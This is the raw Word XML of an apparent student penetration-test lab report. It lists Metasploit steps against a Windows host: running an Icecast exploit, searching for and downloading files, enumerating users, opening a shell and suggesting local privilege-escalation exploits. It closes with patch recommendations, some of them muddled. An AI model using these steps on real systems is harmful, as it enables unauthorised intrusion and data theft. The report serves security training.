          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3733F2B0" wp14:editId="0F839E00">
            <wp:extent cx="5943600" cy="4868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868545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00684D8C">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="408B4553" w14:textId="77777777" w:rsidR="00684D8C" w:rsidRDefault="00684D8C" w:rsidP="00684D8C">
      <w:r>
        <w:t xml:space="preserve">6. Run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E968B53" w14:textId="16FDED67" w:rsidR="00684D8C" w:rsidRDefault="00684D8C" w:rsidP="00684D8C">
      <w:r>
        <w:t xml:space="preserve">    - Run the command that runs the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206BEF48" w14:textId="04928CF8" w:rsidR="00684D8C" w:rsidRDefault="00684D8C" w:rsidP="00684D8C">
      <w:r>
        <w:t xml:space="preserve">     &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308983F5" w14:textId="65CE6E01" w:rsidR="00684D8C" w:rsidRDefault="00684D8C" w:rsidP="00684D8C">
      <w:r>
        <w:t xml:space="preserve">    - Run the command that performs a search for the `secretfile.txt` on the target.    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26981E07" w14:textId="5BE2CA32" w:rsidR="00684D8C" w:rsidRDefault="00684D8C" w:rsidP="00684D8C">
      <w:r>
        <w:t xml:space="preserve">     &gt; search -f *secretfile*.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E8E680" w14:textId="218EA9AF" w:rsidR="00684D8C" w:rsidRDefault="00684D8C" w:rsidP="00684D8C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79106C1F" wp14:editId="66FC1E80">
            <wp:extent cx="5943600" cy="4485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485005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F0F8CD" w14:textId="77777777" w:rsidR="003858A5" w:rsidRDefault="003858A5" w:rsidP="003858A5">
      <w:r>
        <w:t>7. You should now have a Meterpreter session open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153438A0" w14:textId="77777777" w:rsidR="003858A5" w:rsidRDefault="003858A5" w:rsidP="003858A5">
      <w:r>
        <w:t xml:space="preserve">    - Run the command to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>performs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a search for the `recipe.txt` on the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6798F2CB" w14:textId="331D6876" w:rsidR="003858A5" w:rsidRDefault="003858A5" w:rsidP="003858A5">
      <w:r>
        <w:t xml:space="preserve">      &gt; search -f *recipe*.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DFE0B6" w14:textId="0DC16467" w:rsidR="003858A5" w:rsidRDefault="003858A5" w:rsidP="003858A5">
      <w:r>
        <w:t xml:space="preserve">      Run the command that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exfiltrates</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the `recipe*.txt` file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAF2590" w14:textId="19FCF481" w:rsidR="003858A5" w:rsidRDefault="003858A5" w:rsidP="003858A5">
      <w:r>
        <w:t xml:space="preserve">      &gt; download 'c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Users\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>IEuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Documents\Drinks.recipe.txt'</w:t>
      </w:r>
      <w:r w:rsidR="00A73FC5">
        <w:br/>
      </w:r>
      <w:r w:rsidR="009D77E7">
        <w:br/>
      </w:r>
      <w:r w:rsidR="009D77E7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E0869CA" wp14:editId="63E175E4">
            <wp:extent cx="5943600" cy="741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741680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5294B0" w14:textId="428CA064" w:rsidR="009D77E7" w:rsidRDefault="009D77E7" w:rsidP="003858A5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27F1F39F" wp14:editId="186CFA43">
            <wp:extent cx="5943600" cy="948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48690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="386B87A3" w14:textId="4A467C88" w:rsidR="006F37C8" w:rsidRDefault="006F37C8" w:rsidP="003858A5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D243B43" wp14:editId="3E763718">
            <wp:extent cx="5943600" cy="2366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66010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE4AA3E" w14:textId="77777777" w:rsidR="00B70678" w:rsidRDefault="00B70678" w:rsidP="00B70678">
      <w:r>
        <w:t xml:space="preserve">8. You can also use Meterpreter's local exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to find possible exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFF62C2" w14:textId="67B4AAF2" w:rsidR="002E3EF7" w:rsidRDefault="002E3EF7" w:rsidP="00B70678">
      <w:r>
        <w:t>&gt; run post/multi/recon/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>local_exploit_suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="457E7E04" w14:textId="0414359D" w:rsidR="00B70678" w:rsidRDefault="002E3EF7" w:rsidP="00B70678">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1659887A" wp14:editId="54A5647B">
            <wp:extent cx="5943600" cy="1163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163320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D697C1E" w14:textId="77777777" w:rsidR="002E3EF7" w:rsidRDefault="002E3EF7" w:rsidP="002E3EF7">
      <w:r>
        <w:t>A. Run a Meterpreter post script that enumerates all logged on users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708C007A" w14:textId="1B090AB1" w:rsidR="002E3EF7" w:rsidRDefault="002E3EF7" w:rsidP="002E3EF7">
      <w:r>
        <w:t xml:space="preserve">  &gt; run post/windows/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enum_logged_on_users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67C32AA0" w14:textId="77777777" w:rsidR="004E6D4A" w:rsidRPr="001100B8" w:rsidRDefault="004E6D4A" w:rsidP="004E6D4A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001100B8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>B. Open a Meterpreter shell and gather system information for the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA53DF" w14:textId="77777777" w:rsidR="004E6D4A" w:rsidRDefault="004E6D4A" w:rsidP="004E6D4A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001100B8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&gt; Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4393ED54" w14:textId="1D0484A3" w:rsidR="001100B8" w:rsidRPr="001100B8" w:rsidRDefault="001100B8" w:rsidP="004E6D4A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="516121E1" wp14:editId="351D7B25">
            <wp:extent cx="5943600" cy="4751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51705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2370F2" w14:textId="39D044E4" w:rsidR="004E6D4A" w:rsidRPr="001100B8" w:rsidRDefault="004E6D4A" w:rsidP="004E6D4A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001100B8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>C. Run the command that displays the target's computer system information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B0E1FB" w14:textId="0364B2A9" w:rsidR="004E6D4A" w:rsidRDefault="004E6D4A" w:rsidP="004E6D4A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001100B8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001100B8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="470A1867" w14:textId="277DFB84" w:rsidR="001100B8" w:rsidRDefault="001100B8" w:rsidP="004E6D4A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2726CBC6" wp14:editId="7FCE13B4">
            <wp:extent cx="5943600" cy="4493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93895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC99C26" w14:textId="77777777" w:rsidR="001100B8" w:rsidRPr="001100B8" w:rsidRDefault="001100B8" w:rsidP="004E6D4A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="454726E6" w14:textId="1D782B0F" w:rsidR="004E6D4A" w:rsidRDefault="001100B8" w:rsidP="004E6D4A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26189C58" wp14:editId="228EBC7B">
            <wp:extent cx="5943600" cy="4554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54855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EF40B6" w14:textId="77777777" w:rsidR="004E6D4A" w:rsidRDefault="004E6D4A" w:rsidP="004E6D4A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="005E1840" w14:textId="77777777" w:rsidR="004E6D4A" w:rsidRDefault="004E6D4A" w:rsidP="002E3EF7"/>
    <w:p w14:paraId="523C140E" w14:textId="5DEEEE17" w:rsidR="00684D8C" w:rsidRDefault="002E3EF7" w:rsidP="002E3EF7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3230C318" wp14:editId="170F0FF3">
            <wp:extent cx="5943600" cy="3923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923030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B66A11" w14:textId="77777777" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00A734A3"/>
    <w:p w14:paraId="63BD4CAD" w14:textId="30D7664C" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00484430"/>
    <w:p w14:paraId="527C35F1" w14:textId="18004F04" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00484430">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59389B07" w14:textId="6F4DAEE0" w:rsidR="002B2DB1" w:rsidRPr="00B46E83" w:rsidRDefault="00B46E83" w:rsidP="002B2DB1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="3B454A"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B82F4E" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>Please, create permission policies that only allow certain services or ports at minimal permission level based on the department. CEO should encrypt files or folders to add another layer of security</w:t>
      </w:r>
      <w:r w:rsidR="00B82F4E" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">for important files or folders. </w:t>
      </w:r>
      <w:r w:rsidR="002B2DB1" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The target appears to be vulnerable</w:t>
      </w:r>
      <w:r w:rsidR="00B82F4E" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2C96C3" w14:textId="77777777" w:rsidR="002B2DB1" w:rsidRPr="00B46E83" w:rsidRDefault="002B2DB1" w:rsidP="002B2DB1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>1) exploit/windows/local/ms16 075 reflection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6F9D557F" w14:textId="77777777" w:rsidR="002B2DB1" w:rsidRPr="00B46E83" w:rsidRDefault="002B2DB1" w:rsidP="002B2DB1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>In reference to Microsoft based on MS16-075 "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-075"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AFEE20" w14:textId="7106A126" w:rsidR="002B2DB1" w:rsidRPr="00B46E83" w:rsidRDefault="002B2DB1" w:rsidP="002B2DB1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The remote Windows host is missing a security update. It is, therefore, affected by an elevation of privilege vulnerability in the Microsoft Server Message Block (SMB) server when handling forwarded credential requests that are intended for another service running on the same host. An authenticated attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4F2FEB" w14:textId="77777777" w:rsidR="002B2DB1" w:rsidRPr="00B46E83" w:rsidRDefault="002B2DB1" w:rsidP="002B2DB1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CFA367E" w14:textId="1A65F2E2" w:rsidR="001D6E66" w:rsidRDefault="002B2DB1" w:rsidP="00B46E83">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="3B454A"/>
          <w:spacing w:val="5"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Solution</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, and 10.</w:t>
      </w:r>
      <w:r w:rsidR="001D6E66" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D6E66" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t>2. exploit/windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001D6E66" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ikeext_service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001D6E66" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D6E66" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidR="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D6E66" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve">This module exploits a missing DLL loaded by the 'IKE and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001D6E66" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>AuthIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001D6E66" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keyring Modules' (IKEEXT) service which runs as SYSTEM, and starts automatically in default installations of Vista-Win8. It requires an insecure bin path to plant the DLL payload.</w:t>
      </w:r>
      <w:r w:rsidR="00C45A0A" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C45A0A" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:br/>
        <w:t>Solution</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C45A0A" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C45A0A" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C45A0A" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C45A0A" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C45A0A" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit is an old vulner</w:t>
      </w:r>
      <w:r w:rsidR="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ability that can be fixed with the latest</w:t>
      </w:r>
      <w:r w:rsidR="00C45A0A" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows patch. </w:t>
      </w:r>
      <w:r w:rsidR="00C45A0A" w:rsidRPr="00B46E83">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C45A0A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C1E12" w14:textId="77777777" w:rsidR="00C45A0A" w:rsidRPr="001D6E66" w:rsidRDefault="00C45A0A" w:rsidP="001D6E66">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="3B454A"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC73BB4" w14:textId="77777777" w:rsidR="001D6E66" w:rsidRDefault="001D6E66" w:rsidP="002B2DB1"/>
    <w:p w14:paraId="75436E50" w14:textId="77777777" w:rsidR="002B2DB1" w:rsidRPr="00484430" w:rsidRDefault="002B2DB1" w:rsidP="00484430"/>
